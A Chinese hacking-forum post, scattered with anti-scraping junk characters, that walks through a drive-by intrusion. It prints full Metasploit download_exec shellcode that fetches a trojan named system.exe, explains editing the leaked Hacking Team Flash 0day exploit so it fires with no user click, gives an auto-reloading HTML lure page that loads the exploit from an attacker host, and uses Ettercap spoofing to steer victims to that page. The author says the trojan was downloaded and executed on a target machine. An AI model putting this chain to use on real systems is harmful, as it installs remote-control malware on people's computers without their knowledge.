; X4 j, R0 k7 V+ p 三、flash 0day之手工代码修改制作下载者实例入侵演示 2 k+ B0 u7 T% i* M) E
" i) j+ Y9 Z$ s2 y& P0 c2 I/ Q/ [& s4 D/ W* q9 `& J9 g0 a# F' F2 @! N 利用到的工具: . p5 J% K. N+ g# `( s
! A. ^. }6 j Z o: N; Q Msf " \4 N( o2 Z& D% k# F3 I
0 ?" c; ^ }2 w; ^' t% e* w6 z7 P' }4 m+ B2 I! A( C( N! _; y Ettercap : R* p$ y2 `' ~7 i$ s
1 ?9 O5 ~/ E: m4 ?8 ^0 w2 U5 ]; x( W4 z9 r+ g9 z Adobe Flash CS6
1 ?$ n, ^/ o4 P% V" P" B0 b/ }/ |3 ^( S, s Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
, ]7 n: Z& S) m0 m. X 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
如图:
' |' q) [( l+ v$ }& l3 u* J0 f7 l
* C* r$ X4 C. ^& j# K7 }. T# u
8 g9 J: H% O; ~1 i3 h2 t7 t
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: + K+ ~/ u; D9 \- S" T
# I% @& d' [4 q4 j ^+ p
, O$ i! u& i4 K, n `( v, S! [
. f: v1 z' u; T( V3 L9 W- S 然后执行generate -t dword生成shellcode,如下: 7 z6 n' j- n7 e1 A" s* J
' w; F0 n4 h1 ~ M( F' E( L
复制代码到文本下便于我们一会编辑flash exp,如下: % q1 M: p) I& F$ F( I
2 s8 J1 b0 H8 J. X 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 6 x; l0 }# H2 F2 p9 t& b$ ?$ @; k1 u
& `- {9 G) U( F4 B1 a0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
7 l$ C( D1 P" {* G/ e5 L 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
( Y* X( C7 t2 D: E( D0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, / Q7 q2 x/ _0 J b
# [0 b3 ]0 p; I( d# l0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
9 O. O7 [6 F }6 }8 j 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ) Z3 z' X: _6 q- o9 G$ e$ x! _
% o. ]# l& I7 I! H* l1 s. z/ F& Y& R1 m% G! d 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, " x+ X4 o* n$ Y1 k1 H1 {
4 j, Q4 l8 p2 b6 k0 r# [5 q5 x: E) g0 V 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
$ ~( `+ D7 h3 k& K+ L; J. p' J( v! `" B: v5 o( e; X 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, / P/ B3 F! O* j/ r0 w. {; A8 H
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
/ P N0 l8 H1 ^' |1 P% o 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
; Q+ Q7 k5 b2 h1 q, ~8 n% _" j1 Z9 @4 j7 V 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
& t8 X- M* T) t, d* a3 B 4 q* @ i [4 t- a0 ~9 H" y
- v8 F" E! v; B1 r
下面我们来修改flash 0day exp,需要修改三个文件,分别为: ! ^1 t5 S) M' ~) j8 x
( q& y) X9 k$ w. p/ q. @% |
先修改ShellWin32.as,部分源代码如图: # V$ |: A$ w' c2 r0 B
% Z+ z1 P* \( P% L
6 a+ c& A, V% j [: g! I3 }8 b0 q 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
) |! n/ M4 f, w: [" M+ n
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
- x0 h h$ r; \* S; T+ j
7 W! m' z! c: Q3 G. G) f
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
5 k w1 h4 v5 P, o' r/ M1 _. t+ _' z- j# G+ @3 N. W
$ E3 C7 c/ N0 f& Z4 S+ ]! q( Z$ ]% g7 R) z) N
' ?8 Z1 \' P6 d# J3 {9 D% D g/ m$ O. d# Y/ r9 g0 o
! o3 k: Z/ ~5 o
0 `% A' n; k3 m2 e& W6 ~6 B 然后点保存,下面我们来编译一下,打开 ' N& N' P5 Y3 f: ] Y
' M9 \( T, G2 x& j, Q+ gexp1.fla然后点文件-发布,看看编译没错误
8 Y. B M! @% X: J, A! J' \2 [5 E9 z
: e4 g0 Y) w7 y7 _9 N4 [
' ]. o5 w/ D* f: l ) |, r! }2 u5 P7 x
/ c, l K7 }/ q( O" d2 M
$ L5 `& y& l$ w- Q6 s6 e$ Q# o/ R 然后我们把生成的 " e0 }1 Q( p, ^
exp1.swf丢到kailinux 的/var/www/html下: 8 a0 M9 i. i1 E0 P
9 {9 {1 _) H, c6 d! t- m# ]2 x7 k% d0 z+ Z! T3 u8 A 然后把这段代码好好编辑一下
5 n, I# @" p* v5 X1 d0 B% R4 i' u" s: I$ {( {% Z0 \& d6 R 7 d8 Y/ N( Q! F. x* {
) ?' x: t8 u+ f. u, _- t) {2 D4 U: z) @* Q
& Y) G& J- e, X' R1 h4 w* y) Z9 o9 j' @7 G- z5 F4 Z, H o, _ . @* Q* U1 w/ l& K/ F$ u
9 Z! G1 W2 X. }( {" j6 W$ k& ^' [- Q4 T9 t+ m$ Z4 \9 { / H/ r+ y9 w# {5 _( ~% A$ P2 e
: U9 z- c8 D, p4 g4 S# R. |5 g 8 U. S% w+ V8 J0 E9 ]
6 R! ^- Y2 ?% ]) r9 W0 Y1 u" Y+ e 1 {0 B) P0 d' N4 M9 U
6 g s0 A; X, A9 O9 @. h6 c# C- ^& L8 g; P: C( A) H <!DOCTYPE html> " | d$ T; Y Y1 E; o
4 v K( C/ S6 H <html>
& o+ I/ J Z/ w8 |7 O0 x) j9 l- u <head> 1 u7 ?6 N3 \0 _& D% K& p* \
3 N3 t$ a, V0 h9 ^$ ^ <meta http-equiv="Content-Type" content="text/html; ! w3 G1 u# |6 q5 t6 U
charset=utf-8"/>
</head> 2 z: X" R6 j7 l) U7 u) {! `
<body>
<h2> Please wait, the requested page is loading...</h2>
6 B0 P7 G2 F7 }9 m4 V<br>
& q+ X# Y8 t7 F <OBJECT 3 ?* O! C9 w/ n6 c$ h; }
classid="clsid
27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><
ARAM NAME=movie
' f8 v. C7 w. W8 M) D VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
: r1 y! b! h' W7 b$ C+ h) t3 y" k; O/ z9 Q </body> + o0 C* j9 l( J d' t- m( C
+ t* I/ P8 T& n, [1 h& P6 c) ~ <script>
setTimeout(function () { ( X, m ~" F" I$ B
) \7 ]: ^ }4 ]& L" j $ ]+ @2 i! D$ Q6 Y# h1 z( R' ^
7 }3 M' C5 M6 Q( H/ g. S4 Mwindow.location.reload();
}, 10000);
% t: P: T$ M& v( p e J5 P& `' }+ y, C( q3 K+ x
+ t, h {& Z3 @$ V% s$ R( D, w+ I3 E% y8 E3 p. s </script>
2 y* b, O: U; w; H h </html> x' z+ c" m- a' y }' e
8 ?7 b) a6 K" `1 a& X: s- s + x c- y/ `* o6 ]
4 T; x7 E# v# T( S$ r注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
7 y; r7 q. f o. p2 e8 ^, b
9 b% Q5 C& e0 X$ \) y1 x2 {
1 Q; }) c* t% k / J: `) r; A/ U; c* v/ V" _$ I
4 G% q% e$ j# ]5 O- j8 [4 U2 }" K! U3 c& L/ a7 B# j6 x1 d1 t
3 l1 }9 Q* D# L- P' U2 A( t# q" F' \/ C$ s# i 下面我们用ettercap欺骗如图: % d, o8 E2 _* B& ~) Z& C& K' o
/ r5 G+ H8 P! m6 Y+ } . f5 a' `1 T$ W+ v
下面我们随便访问个网站看看:
6 Q! i! Z, U. [: W我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: ) L- D: L6 j. F$ j
: H7 U6 v: U/ s9 d8 K3 E. [4 c# ?; G( o
5 p% Y5 j0 E$ {0 G
1 u$ v+ Y5 i, h; I, A" z 我们看另一台, - |* p; q$ i' g
/ E! W& `& m4 `; U& o6 A
提示这个错误,说明木马是成功被下载执行了,
只是由于某些原因没上线而已。。。
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |